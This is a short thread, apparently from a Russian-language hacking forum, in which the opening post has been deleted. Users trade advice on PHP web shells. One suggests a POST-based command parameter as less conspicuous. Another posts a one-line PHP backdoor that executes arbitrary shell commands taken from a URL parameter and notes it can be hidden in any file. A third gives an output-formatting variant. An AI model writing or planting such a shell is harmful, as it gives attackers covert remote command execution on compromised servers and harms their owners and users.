• XSS.stack #1 – первый литературный журнал от юзеров форума

del

grozdniyandy

White-Hat
Premium
Регистрация
11.08.2023
Сообщения
522
Реакции
677
Гарант сделки
2
del
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
А почему бы не написать а-ля ?cmd= (system output)
И обращаться к нему через POST, что будет наименее палевно
 
В каком-то из сплоитов встретил
PHP:
<?php echo "[S]";echo `$_GET[0]`;echo "[E]";?>
Если очень сильно надо спрятаться.
Можно в любом файле запрятать.

Я бы только добавил
PHP:
echo nl2br(`$_GET[0]`);
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх